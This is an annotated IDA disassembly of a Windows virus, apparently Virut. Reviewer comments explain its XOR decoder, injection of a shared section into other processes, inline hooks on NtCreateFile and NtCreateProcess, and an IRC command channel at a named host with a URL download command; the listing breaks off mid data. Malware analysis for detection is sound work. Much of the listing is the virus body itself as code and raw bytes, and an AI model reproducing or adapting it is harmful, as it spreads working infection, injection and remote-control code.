                pop ecx
                mov [eax+29B0h], esi            ; save caller's esi / edi
                mov [eax+29B4h], edi
                cmp byte ptr [eax+242Fh], 0E8h  ; 0E8h is the opcode of a near call
                jnz short loc_3150B2F6
                add ebx, [eax+2430h]
                mov ebx, [ebx+2]
                push dword ptr [ebx]
                jmp short loc_3150B2FE
; ---------------------------------------------------------------------------

loc_3150B2F6:                           ; CODE XREF: UPX2:3150B2E7j
                mov ebx, [eax+2431h]
                push dword ptr [ebx]

loc_3150B2FE:                           ; CODE XREF: UPX2:3150B2F4j
                pop ebx

loc_3150B2FF:                           ; CODE XREF: UPX2:3150B2D0j
                push ebp
                xchg eax, ebp
                sub dword ptr [esp+4], 203Ah
                and ebx, 0FFFFF000h             ; round the scan pointer down to a page boundary
                sub ebp, 401006h                ; ebp = delta between run-time and link-time addresses
                mov edi, [esp+4]
                lea esi, [ebp+40343Ch]
                mov ecx, 0                      ; count is 0 in this sample, so the copy below moves nothing
                rep movsb

; Scan backwards in 100h steps for a module header: 'This' at +4Eh (from the
; DOS stub text "This program ...") and a 'PE' signature at the offset stored
; at +3Ch (e_lfanew).
loc_3150B326:                           ; CODE XREF: UPX2:3150B342j
                cmp dword ptr [ebx+4Eh], 73696854h ; 'This'
                jnz short loc_3150B33C
                mov eax, [ebx+3Ch]
                lea eax, [eax+ebx]
                cmp word ptr [eax], 4550h       ; 'PE'
                jz short loc_3150B344

loc_3150B33C:                           ; CODE XREF: UPX2:3150B32Dj
                sub ebx, 100h
                jnz short loc_3150B326

; eax = PE header, ebx = module base. Walk the export directory (data
; directory entry at PE+78h): +20h AddressOfNames, +18h NumberOfNames.
loc_3150B344:                           ; CODE XREF: UPX2:3150B33Aj
                mov edx, [eax+78h]
                add edx, ebx
                mov esi, [edx+20h]
                mov ecx, [edx+18h]
                add esi, ebx
                push ecx

; Compare each export name with "GetProcAddress" (the first compare is done at
; name-1, so it also requires a 0 byte before the name).
loc_3150B352:                           ; CODE XREF: UPX2:loc_3150B379j
                lodsd
                add eax, ebx
                cmp dword ptr [eax-1], 74654700h ; 0,'Get'
                jnz short loc_3150B379
                cmp dword ptr [eax+3], 636F7250h ; 'Proc'
                jnz short loc_3150B379
                cmp dword ptr [eax+7], 72646441h ; 'Addr'
                jnz short loc_3150B379
                cmp dword ptr [eax+0Bh], 737365h ; 'ess',0
                jz short loc_3150B37E

loc_3150B379:                           ; CODE XREF: UPX2:3150B35Cj
                                        ; UPX2:3150B365j ...
                loop loc_3150B352
                pop ecx                         ; name not found: give up and return
                pop ebp
                retn
; ---------------------------------------------------------------------------

; Name found: turn the name index into a function address via
; +24h AddressOfNameOrdinals and +1Ch AddressOfFunctions. esi ends up holding
; the address of the matched export (GetProcAddress).
loc_3150B37E:                           ; CODE XREF: UPX2:3150B377j
                sub [esp], ecx                  ; NumberOfNames - remaining count = index of the match
                mov esi, [edx+24h]
                pop ecx
                add esi, ebx
                movzx eax, word ptr [esi+ecx*2]
                mov edi, [edx+1Ch]
                add edi, ebx
                mov esi, [edi+eax*4]
                add esi, ebx
; NOTE(review): each call below is used to push the address of an inline
; string; IDA disassembled the string bytes as instructions. The bytes after
; this call decode as 'CloseHandle',0 followed by 53 FF D6 (push ebx /
; call esi), i.e. GetProcAddress(module, "CloseHandle").
                call near ptr loc_3150B3A4+2
                inc ebx
                insb
                outsd
                jnb short near ptr loc_3150B402+2
                dec eax
                popa
                outsb
                db 64h
                insb

loc_3150B3A4:                           ; CODE XREF: UPX2:3150B395p
                add gs:[ebx-1], dl
                setalc
                mov [ebp+40353Ch], eax          ; slot 40353Ch <- result (CloseHandle per the string above)
; NOTE(review): inline string bytes decode as 'CreateEventA',0, again
; followed by push ebx / call esi.
                call near ptr loc_3150B3C0+1
                inc ebx
                jb short near ptr loc_3150B41B+1
                popa
                jz short near ptr loc_3150B41B+4
                inc ebp
                jbe short near ptr loc_3150B421+1
                outsb
                jz short near ptr loc_3150B3FF+2

loc_3150B3C0:                           ; CODE XREF: UPX2:3150B3AFp
                add [ebx-1], dl
                setalc
                mov [ebp+403540h], eax          ; slot 403540h <- result (CreateEventA per the string above)
; NOTE(review): inline string bytes decode as 'GetLastError',0; the call
; target sub_3150B3DC starts with push ebx / call esi to resolve it.
                call sub_3150B3DC
                inc edi
                db 65h
                jz short near ptr loc_3150B41B+4
                popa
                jnb short loc_3150B44A
                inc ebp
                jb short near ptr loc_3150B44A+1
                outsd
                jb short $+2

; =============== S U B R O U T I N E =======================================

; Main set-up routine. Resolves the name pushed by its caller, then uses
; sub_3150B45A (named-event creation) as a single-instance check: if the call
; stored at 403544h returns non-zero after the event is created, the handle is
; closed and the routine leaves; if it returns zero, the block at 4011D2h
; (relative to ebp) is decoded with sub_3150B475 and execution continues at
; loc_3150B485.
sub_3150B3DC    proc near               ; CODE XREF: UPX2:3150B3CAp

; FUNCTION CHUNK AT 3150B485 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 3150B5C5 SIZE 0000013A BYTES

                push ebx                        ; module base
                call esi                        ; esi = address resolved by the export walk above
                mov [ebp+403544h], eax
                call sub_3150B45A
                test eax, eax
                jz short loc_3150B40F           ; no handle: skip the close
                push eax                        ; handle stays on the stack for the call at loc_3150B409
                call dword ptr [ebp+403544h]
                test eax, eax
                jnz short loc_3150B409          ; non-zero status: treat as "already running"
                lea eax, [ebp+4011D2h]          ; start of the encoded block

loc_3150B3FF:                           ; CODE XREF: UPX2:3150B3BEj
                mov dl, [eax-1]                 ; key byte is stored just before the block

loc_3150B402:                           ; CODE XREF: UPX2:3150B39Dj
                call sub_3150B475
                jmp short loc_3150B485
; ---------------------------------------------------------------------------

loc_3150B409:                           ; CODE XREF: sub_3150B3DC+1Bj
                                        ; sub_3150B3DC+136j ...
                call dword ptr [ebp+40353Ch]    ; slot filled above (CloseHandle per the inline string)

loc_3150B40F:                           ; CODE XREF: sub_3150B3DC+10j
                test dword ptr [ebp+403431h], 80000000h
                jz short loc_3150B439

loc_3150B41B:                           ; CODE XREF: UPX2:3150B3B5j
                                        ; UPX2:3150B3B8j ...
; Tail of sub_3150B3DC (exit path): copies 5 bytes from 403435h (relative to
; ebp) to the address held at [esp+4], then reloads ebx/esi/edi from three
; saved slots and returns.
                lea esi, [ebp+403435h]

loc_3150B421:                           ; CODE XREF: UPX2:3150B3BBj
                mov edi, [esp+4]
                movsb
                movsd
                mov ebx, [ebp+4039B2h]
                mov esi, [ebp+4039B6h]
                mov edi, [ebp+4039BAh]

loc_3150B439:                           ; CODE XREF: sub_3150B3DC+3Dj
                pop ebp
                retn
sub_3150B3DC    endp

; ---------------------------------------------------------------------------

; Helper reached by "call": pops its own return address into edx, builds two
; structures on the stack (20h bytes in total) and jumps back through edx with
; eax pointing at the second one.
; NOTE(review): "db 8Bh" + "les ebp, [edx+0]" encode as 8B C4 6A 00, i.e.
; mov eax, esp / push 0. The result looks like a security descriptor
; (revision 1, control 4) referenced from a 0Ch-byte SECURITY_ATTRIBUTES, so
; the object created with it would be open to every account - confirm.
loc_3150B43B:                           ; CODE XREF: sub_3150B45A+2p
                                        ; sub_3150B3DC:loc_3150B644p
                pop edx
                push 0
                push 0
                push 0
                push 0
                push 40001h
; ---------------------------------------------------------------------------
                db 8Bh
; ---------------------------------------------------------------------------

loc_3150B44A:                           ; CODE XREF: UPX2:3150B3D4j
                                        ; UPX2:3150B3D7j
                les ebp, [edx+0]
                push eax
                push 0Ch
                mov eax, esp
                jmp edx
; ---------------------------------------------------------------------------
; Object name; presumably the string addressed as [ebp+4011A1h] below.
; Useful as a host indicator.
aVt_3           db 'VT_3',0
                align 2

; =============== S U B R O U T I N E =======================================

; Calls the function stored at 403540h with (attributes from loc_3150B43B,
; 0, 0, name at 4011A1h) and returns its result in eax. Elsewhere in this
; listing that slot is filled right after an inline 'CreateEventA' string, so
; this is presumably CreateEventA(attrs, FALSE, FALSE, name).
sub_3150B45A    proc near               ; CODE XREF: sub_3150B3DC+9p
                xor ecx, ecx
                call loc_3150B43B
                lea edx, [ebp+4011A1h]
                push edx
                push ecx
                push ecx
                push eax
                call dword ptr [ebp+403540h]
                add esp, 20h                    ; drop the 20h bytes built by loc_3150B43B
                retn
sub_3150B45A    endp ; sp-analysis failed


; =============== S U B R O U T I N E =======================================

; In-place XOR decoder.
; In:  eax = buffer, dl = initial key byte.
; Decodes 225Fh bytes; after every byte the key is increased by its initial
; value (dh keeps the step). Clobbers eax, ecx, edx.
sub_3150B475    proc near               ; CODE XREF: sub_3150B3DC:loc_3150B402p
                                        ; sub_3150D249+25Bp
                mov dh, dl
                mov ecx, 225Fh

loc_3150B47C:                           ; CODE XREF: sub_3150B475+Cj
                xor [eax], dl
                inc eax
                add dl, dh
                loop loc_3150B47C
                retn
sub_3150B475    endp

; ---------------------------------------------------------------------------
; Byte immediately before loc_3150B485; sub_3150B3DC reads its key from
; [block-1], so this is presumably the stored XOR key.
                db 88h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B3DC

; First code of the XOR-encoded block: clears three state dwords, then sets
; 40397Eh to 1 + 8 * (number of set bits in the dword at 403431h).
loc_3150B485:                           ; CODE XREF: sub_3150B3DC+2Bj
                and dword ptr [ebp+401580h], 0
                and dword ptr [ebp+401584h], 0
                and dword ptr [ebp+401588h], 0
                mov eax, [ebp+403431h]
                xor ecx, ecx
                push 1
                mov cl, 20h                     ; 32 bits to examine
                pop dword ptr [ebp+40397Eh]

loc_3150B4AC:                           ; CODE XREF: sub_3150B3DC+E0j
                xor edx, edx
                shr eax, 1
                setb dl                         ; dl = bit shifted out
                shl dl, 3                       ; 8 if the bit was set
                add [ebp+40397Eh], edx
                loop loc_3150B4AC
                push edi
; (the next instruction is split across the source line break)
                mov byte
ptr [ebp+401303h], 1
                mov [ebp+403548h], esi          ; keep the resolved GetProcAddress pointer for sub_3150B83F
; Fill a 1Eh-entry pointer table at 403558h from the name list at 4015BBh.
; By position in the name strings shown later in this listing (lstrlen ..
; WriteFile, 30 names), 403594h would be GetVersion, 4035BCh Sleep and
; 4035C8h VirtualAlloc - confirm against the table.
                lea esi, [ebp+4015BBh]
                xor ecx, ecx
                lea edi, [ebp+403558h]
                mov cl, 1Eh
                call sub_3150B83F
                pop edi
                call dword ptr [ebp+403594h]
                shr eax, 1Fh                    ; keep only bit 31 of the result
                jz loc_3150B5C5                 ; bit clear: take the path at loc_3150B5C5
; Bit set: take a raw export-table entry ([edi+14h], edi being the function
; table pointer saved above) and allocate 69CEh bytes with protection 40h
; (PAGE_EXECUTE_READWRITE).
                mov eax, [edi+14h]
                push 40h
                add eax, ebx
                push 8001000h
                mov [ebp+403550h], eax
                push 69CEh
                push 0
                call dword ptr [ebp+4035C8h]
                test eax, eax
                jz loc_3150B409
; Copy 0A74h dwords of the body into the new allocation, rebase ebp to the
; copy and continue there at offset 283h.
                xchg eax, edi
                lea esi, [ebp+401000h]
                mov ebp, edi
                mov ecx, 0A74h
                sub ebp, 401000h
                lea edx, [ebp+401283h]
                rep movsd
                jmp edx
; END OF FUNCTION CHUNK FOR sub_3150B3DC
; ---------------------------------------------------------------------------
; Code at body offset 283h: runs in the relocated copy. Builds a zeroed
; 20h-byte block holding a pointer to 401A3Dh and makes four calls through
; the pointer saved at 403550h with service codes 10003h, 10000h, 10001h and
; 1000Ah. The meaning of those codes is not visible in this listing.
                sub esp, 20h
                mov edi, esp
                push 8
                xor eax, eax
                pop ecx
                lea edx, [ebp+401A3Dh]
                rep stosd
                mov edi, esp
                mov [edi+10h], edx
                inc byte ptr [edi+1Ch]
                push edi
                push 10003h
                call dword ptr [ebp+403550h]
                add esp, 20h
                test eax, eax
                jz loc_3150B409
                xchg eax, edi
                push 0
                push 1
                push 80000400h
                push 10000h
                call dword ptr [ebp+403550h]
                test eax, eax
                jz loc_3150B409
                push 0
                push eax
                push 40000h
                push 0
                shr eax, 0Ch
                push edi
                push 1
                push eax
                push 10001h
                call dword ptr [ebp+403550h]
                push 1000Ah
                call dword ptr [ebp+403550h]
                call sub_3150B5B5
                jmp loc_3150B409

; =============== S U B R O U T I N E =======================================

; Endless wait loop: ecx is always 1 at the jecxz, so the exit branch is never
; taken and the function stored at 4035BCh is called with 0Ah forever
; (Sleep(10) if the table order noted above holds).
sub_3150B5B5    proc near               ; CODE XREF: UPX2:3150B5ABp
                                        ; sub_3150B5B5+Dj
                push 1
                pop ecx
                jecxz short locret_3150B5C4
                push 0Ah
                call dword ptr [ebp+4035BCh]
                jmp short sub_3150B5B5
; ---------------------------------------------------------------------------

locret_3150B5C4:                        ; CODE XREF: sub_3150B5B5+3j
                retn
sub_3150B5B5    endp

; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B3DC

; Path taken when bit 31 of the version result is clear. Requires the table
; slot at 403570h to be non-zero, then resolves a second pointer table.
loc_3150B5C5:                           ; CODE XREF: sub_3150B3DC+10Fj
                cmp dword ptr [ebp+403570h], 0
                jz loc_3150B409
; NOTE(review): inline string again. The bytes after the call decode as
; 'NTDLL',0 followed by FF 95 88 35 40 00 (call [ebp+403588h]), 8D B5 ..
; (lea esi, [ebp+...]) and 33 C9 (xor ecx, ecx); IDA shows them as the
; unrelated instructions below.
                call near ptr loc_3150B5DC+1
                dec esi
                push esp
                inc esp
                dec esp
                dec esp

loc_3150B5DC:                           ; CODE XREF: sub_3150B3DC+1F6p
                add bh, bh
                xchg eax, ebp
                mov ds:0B58D0040h, dh
                jnb short near ptr loc_3150B5F9+5
                inc eax
                add [ebx], dh
                leave
                lea edi, [ebp+4035D0h]          ; destination table for the second name list
; (the next instruction is split across the source line break)
                mov
cl, 0Bh xchg eax, ebx call sub_3150B83F loc_3150B5F9: ; CODE XREF: sub_3150B3DC+209j cmp dword ptr [ebp+4035F8h], 0 jz loc_3150B409 mov eax, [ebp+4035D4h] push dword ptr [eax+1] pop dword ptr [ebp+403395h] mov eax, [ebp+4035E8h] push dword ptr [eax+1] pop dword ptr [ebp+4033E2h] mov eax, [ebp+4035D8h] push dword ptr [eax+1] pop dword ptr [ebp+4033E9h] mov ecx, [ebp+4035DCh] jecxz short loc_3150B644 push dword ptr [ecx+1] pop dword ptr [ebp+4033F6h] loc_3150B644: ; CODE XREF: sub_3150B3DC+25Dj call loc_3150B43B lea edi, [ebp+40364Eh] mov ecx, edi push 0 neg cl push dword ptr [eax+4] and ecx, 3 push 40h add edi, ecx push edi push 0 push 18h lea esi, [ebp+40159Fh] mov ecx, 1Ch mov edx, esp lea eax, ds:0FFFFFFFEh[ecx*2] stosw lea eax, ds:0[ecx*2] stosw lea eax, [edi+4] stosd xor ah, ah loc_3150B689: ; CODE XREF: sub_3150B3DC+2B0j lodsb stosw loop loc_3150B689 push 0 push 69CEh mov ecx, esp push 0 mov eax, esp push 0 push 8000000h push 40h push ecx push edx push 0Eh push eax call dword ptr [ebp+4035E0h] pop eax add esp, 40h push 69CEh mov edx, esp push 0 mov ecx, esp push 40h push 0 push 2 push edx push 0 push 69CEh push 0 push ecx push 0FFFFFFFFh push eax call dword ptr [ebp+4035E4h] pop edi pop ecx test edi, edi jz loc_3150B409 lea esi, [ebp+401000h] mov ecx, 0A74h mov ebp, edi rep movsd sub ebp, 401000h lea eax, [ebp+40144Ch] jmp eax ; END OF FUNCTION CHUNK FOR sub_3150B3DC ; --------------------------------------------------------------------------- db 8Dh db 95h ; db 0E0h, 18h, 40h db 0 db 52h, 0FFh, 95h db 9Ch ; db 35h, 40h, 0 db 0E8h ; db 16h, 2 dup(0) db 0 aLookupprivileg db 'LookupPrivilegeValueA',0 db 50h dd 354895FFh, 85890040h, 40354Ch, 206A5450h, 95FFFF6Ah dd 4035ECh, 755FC085h, 26A963Fh, 0D48B5656h, 0E852016Ah dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 95FF5600h dd 40354Ch, 5656C48Bh, 57565056h, 35D095FFh, 0C4830040h dd 95FF5710h, 40353Ch, 26A006Ah, 357095FFh, 28B90040h dd 97000001h, 0C89E12Bh, 0FF575424h, 4035AC95h, 83F63300h dd 40363CA5h, 
57540000h, 35B095FFh, 0C0850040h, 83465C74h dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 35A895FFh, 0C0850040h dd 0E893DC74h, 43Dh, 0E391C933h, 3C853930h, 75004036h dd 0AEC18128h, 5000000Dh, 51565054h, 0FF535050h, 40356895h dd 59C08500h, 74FF0F74h, 858F0824h, 40363Ch, 0FFFDACE8h dd 95FF53FFh, 40353Ch, 0C48198EBh, 128h, 3C95FF57h, 0E9004035h dd 0FFFFFBE5h, 5800498Dh, 0CE005858h, 65000029h, 0Dh, 2 dup(0) db 3 dup(0) ; =============== S U B R O U T I N E ======================================= sub_3150B83F proc near ; CODE XREF: sub_3150B3DC+100p ; sub_3150B3DC+218p ... push ecx push esi push ebx call dword ptr [ebp+403548h] stosd pop ecx loc_3150B84A: ; CODE XREF: sub_3150B83F+Ej lodsb test al, al jnz short loc_3150B84A loop sub_3150B83F retn sub_3150B83F endp ; --------------------------------------------------------------------------- aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0 aLstrlen db 'lstrlen',0 aCreatefilea db 'CreateFileA',0 aCreatefilemapp db 'CreateFileMappingA',0 aCreateprocessa db 'CreateProcessA',0 aCreateremoteth db 'CreateRemoteThread',0 aCreatethread db 'CreateThread',0 aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 aExitthread db 'ExitThread',0 aFiletimetosyst db 'FileTimeToSystemTime',0 aGetfileattribu db 'GetFileAttributesA',0 aGetfilesize db 'GetFileSize',0 aGetfiletime db 'GetFileTime',0 aGetmodulehandl db 'GetModuleHandleA',0 aGettempfilenam db 'GetTempFileNameA',0 aGettemppatha db 'GetTempPathA',0 aGetversion db 'GetVersion',0 aGetversionexa db 'GetVersionExA',0 aLoadlibrarya db 'LoadLibraryA',0 aMapviewoffile db 'MapViewOfFile',0 aOpenfilemappin db 'OpenFileMappingA',0 aOpenprocess db 'OpenProcess',0 aProcess32first db 'Process32First',0 aProcess32next db 'Process32Next',0 aSetfileattribu db 'SetFileAttributesA',0 aSetfiletime db 'SetFileTime',0 aSleep db 'Sleep',0 aSystemtimetofi db 'SystemTimeToFileTime',0 aUnmapviewoffil db 'UnmapViewOfFile',0 aVirtualalloc db 'VirtualAlloc',0 aWritefile db 'WriteFile',0 aNtadjustprivil db 
'NtAdjustPrivilegesToken',0 aNtcreatefile db 'NtCreateFile',0 aNtcreateproces db 'NtCreateProcess',0 aNtcreateproc_0 db 'NtCreateProcessEx',0 aNtcreatesectio db 'NtCreateSection',0 aNtmapviewofsec db 'NtMapViewOfSection',0 aNtopenfile db 'NtOpenFile',0 aNtopenprocesst db 'NtOpenProcessToken',0 aNtprotectvirtu db 'NtProtectVirtualMemory',0 aNtwritevirtual db 'NtWriteVirtualMemory',0 aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0 aWsastartup db 'WSAStartup',0 aClosesocket db 'closesocket',0 aConnect db 'connect',0 aGethostbyname db 'gethostbyname',0 aRecv db 'recv',0 aSend db 'send',0 aSocket db 'socket',0 aInternetcloseh db 'InternetCloseHandle',0 aInternetgetcon db 'InternetGetConnectedState',0 aInternetopena db 'InternetOpenA',0 aInternetopenur db 'InternetOpenUrlA',0 aInternetreadfi db 'InternetReadFile',0 aAdvapi32_dll db 'ADVAPI32.DLL',0 aRegclosekey db 'RegCloseKey',0 aRegopenkeyexa db 'RegOpenKeyExA',0 aRegqueryvaluee db 'RegQueryValueExA',0 aRegsetvalueexa db 'RegSetValueExA',0 ; =============== S U B R O U T I N E ======================================= sub_3150BBDA proc near ; CODE XREF: UPX2:3150BC81p ; UPX2:3150BC92p ... 
; sub_3150BBDA: overwrite 5 bytes at address eax, in the process whose handle
; is in ebx, with a near call (opcode 0E8h + rel32) to the address in ecx.
; In:  eax = address to patch, ecx = call destination, ebx = process handle.
; The patch is applied with two calls through the table slots 4035F0h and
; 4035F4h: the first receives (process, &address, &size=5, 40h, &old), the
; second (process, address, buffer, 5, 0). By position in the Nt* name list
; shown earlier in this listing these would be NtProtectVirtualMemory and
; NtWriteVirtualMemory - confirm. 40h is PAGE_EXECUTE_READWRITE.
; Detection note: the effect is an inline hook at the first bytes of the
; target function inside another process.
var_5           = byte ptr -5

                sub ecx, 5
                sub ecx, eax                    ; rel32 = destination - (target + 5)
                push ecx
                push 0E8000000h                 ; 0E8h ends up directly in front of rel32 in memory
                lea ecx, [esp+8+var_5]          ; ecx -> the 5-byte call instruction
                push 0
                push 5
                push ecx
                push eax
                push ebx
                push 5
                mov ecx, esp                    ; ecx -> size (5)
                push eax
                mov edx, esp                    ; edx -> copy of the target address
                push eax
                push esp                        ; output slot for the second-to-last argument
                push 40h
                push ecx
                push edx
                push ebx
                call dword ptr [ebp+4035F0h]
                add esp, 0Ch
                call dword ptr [ebp+4035F4h]    ; consumes the five arguments pushed first
                add esp, 8
                retn
sub_3150BBDA    endp

; ---------------------------------------------------------------------------
; Injection routine. In: ebx = process handle. Returns eax = address of the
; mapped view, or 0.
; Opens an existing named object via slot 4035A4h with access 0Eh and the name
; at 4015B1h, maps it into the target through slot 4035E4h with protection 40h,
; closes the handle, optionally calls a callback, then patches up to four
; functions in the target with sub_3150BBDA so they call into the mapped view
; at offsets 2394h, 23E1h, 23E8h and 23F5h.
; NOTE(review): 4015B1h lies inside the '\BaseNamedObjects\W32_Virtu' string
; shown earlier in this listing (offset 12h, i.e. 'W32_Virtu'); by table
; position 4035A4h/4035E4h would be OpenFileMappingA/NtMapViewOfSection and
; 4035D4h/4035E8h/4035D8h/4035DCh NtCreateFile/NtOpenFile/NtCreateProcess/
; NtCreateProcessEx - confirm. The section name is a host indicator.
                push edi
                lea eax, [ebp+4015B1h]
                xor edi, edi                    ; default return value 0
                push eax
                push 0
                push 0Eh
                call dword ptr [ebp+4035A4h]
                test eax, eax
                jz loc_3150BCBD
                push eax                        ; keep the handle for the close call below
                push 69CEh
                mov edx, esp                    ; edx -> size value (69CEh)
                push 0
                mov ecx, esp                    ; ecx -> base address slot (0 = let the system choose)
                push 40h
                push 100000h
                push 2
                push edx
                push 0
                push 69CEh
                push 0
                push ecx
                push ebx
                push eax
                call dword ptr [ebp+4035E4h]
                pop edi                         ; edi = address of the view in the target
                pop ecx
                call dword ptr [ebp+40353Ch]    ; closes the handle pushed above
                test edi, edi
                jz short loc_3150BCBD
                mov ecx, [ebp+401588h]          ; optional callback offset (0 = none)
                jecxz short loc_3150BC75
                lea edx, [ebp+401000h]
                add edx, ecx
                push edi
                push ebx
                call edx

loc_3150BC75:                           ; CODE XREF: UPX2:3150BC67j
                mov eax, [ebp+4035D4h]
                lea ecx, [edi+2394h]
                call sub_3150BBDA
                mov eax, [ebp+4035E8h]
                lea ecx, [edi+23E1h]
                call sub_3150BBDA
                mov eax, [ebp+4035D8h]
                lea ecx, [edi+23E8h]
                call sub_3150BBDA
                mov eax, [ebp+4035DCh]
                test eax, eax                   ; fourth target is optional
                jz short loc_3150BCBD
                lea ecx, [edi+23F5h]
                call sub_3150BBDA

loc_3150BCBD:                           ; CODE XREF: UPX2:3150BC27j
                                        ; UPX2:3150BC5Fj ...
                mov eax, edi
                pop edi
                retn
; ---------------------------------------------------------------------------
; Thread launcher: position-independent (call $+5 / pop ebp), calls slot
; 40356Ch with a start address of 401DAEh and the remaining arguments zero
; except a pointer to a stack slot, then passes the returned handle to slot
; 40353Ch. By table position 40356Ch would be CreateThread - confirm.
                push ebp
                call $+5
                pop ebp
                sub ebp, 401A14h
                xor ecx, ecx
                lea eax, [ebp+401DAEh]
                push ecx                        ; stack slot that receives the output value
                push esp
                push ecx
                push ecx
                push eax
                push ecx
                push ecx
                call dword ptr [ebp+40356Ch]
                xchg eax, [esp]                 ; put the returned handle on the stack as the argument
                call dword ptr [ebp+40353Ch]
                pop ebp
                retn 4
; ---------------------------------------------------------------------------
; Code that IDA left as data; not decoded here.
                dd 0E855h, 815D0000h, 401A43EDh, 8DFF6A00h, 401A0E95h
                dd 0CD525000h, 2A002420h, 0CC48300h, 5485C766h, 0CD00401Ah
                dd 5685C720h, 2400401Ah, 5D002A00h, 6A016AC3h, 0FF33FF01h
                dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
                dd 401A72B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
                dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
                dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4035F095h, 0CC48300h
                dd 3574958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
                dd 581A6AC3h, 9E8h, 61428D00h, 75C9FEAAh
                db 0F0h, 0C3h

; =============== S U B R O U T I N E =======================================

; Pseudo-random number helper.
; In:  eax = range. Out: edx = high dword of eax * new_state, so callers that
; read edx/dl get a value below the range they passed; eax = low dword.
; State is the dword at 403646h, updated as state * 8088405h + 1 (the
; multiplier known from Borland/Delphi's Random).
sub_3150BDA2    proc near               ; CODE XREF: sub_3150C60D+1Bp
                                        ; sub_3150C785+3p ...
                imul edx, [ebp+403646h], 8088405h
                inc edx
                mov [ebp+403646h], edx
                mul edx
                retn
sub_3150BDA2    endp

; ---------------------------------------------------------------------------
; Code and strings that IDA left as data. NOTE(review): read little-endian,
; the dwords below contain these byte patterns and ASCII strings, which are
; useful for detection; confirm by converting the region to code:
;   - 81 3E 'PING' and 81 3E 'PRIV'  : cmp dword ptr [esi], imm32 against the
;     start of a received line
;   - 0D 20 20 20 20 / 3D '!get'     : lower-case, then compare with '!get',
;     followed by compares with ' htt' and 'p://'
;   - 'Download',0 pushed as an inline string before a call through 403620h
;   - 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0 and 'TargetHost',0
;   - 02 00 FF F0 + four bytes, which looks like a sockaddr_in template
;     (family 2, port bytes FF F0)
;   - 'proxim.ircgalaxy.pl',0
;   - 'NICK krwifucc' + 0Ah, then the start of a 'USER ...' line that continues
;     past the end of this run
; Together these point to an IRC-style command channel with a
; download-from-URL command.
                dw 0E855h
                dd 0
                dd 9ED815Dh, 8B00401Bh, 40364A9Dh, 247C8300h, 840F0008h
                dd 0B9h, 208EC81h, 68540000h, 104h, 359095FFh, 0FC8B0040h
                dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
                dd 358C95FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
                dd 6801h, 0FF524000h, 40355C95h, 0F6859600h, 54505B74h
                dd 10468h, 0B4FF5700h, 22024h, 2895FF00h, 59004036h, 1674C085h
                dd 8B5014E3h, 52006AD4h, 0FF565751h, 4035CC95h, 0C0855900h
                dd 0FF56D075h, 40353C95h, 44578D00h, 446A5752h, 4978D58h
                dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
                dd 40356495h, 8C48100h, 0FF000002h, 0FF082474h, 40361895h
                dd 95FF5300h, 403618h, 4C25Dh, 750A3E80h, 8D8B4601h, 401584h
                dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
                dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
                dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
                dd 51006A51h, 95FF5356h, 403610h, 0FC13B59h, 0DF85h, 0A2858D00h
                dd 6A00401Dh, 0C6800h, 53500000h, 361095FFh, 0C3D0040h
                dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
                dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
                dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
                dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
                dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 0BC95FF52h
                dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
                dd 0FF006461h, 40362095h, 74C08500h, 89C93336h, 40364A85h
                dd 685100h, 51800002h, 0FF505651h, 40362495h, 3958D00h
                dd 5000401Bh, 5154C933h, 51515250h, 356C95FFh, 4870040h
                dd 3C95FF24h, 0F8004035h, 778D80C3h, 1004015h, 4F53C3F9h
                dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
                dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
                dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
                dd 0F0FF0002h, 63955F51h, 786F7270h, 692E6D69h, 61676372h
                dd 7978616Ch, 6C702Eh, 4B43494Eh, 77726B20h, 63756669h
                dd 53550A63h,
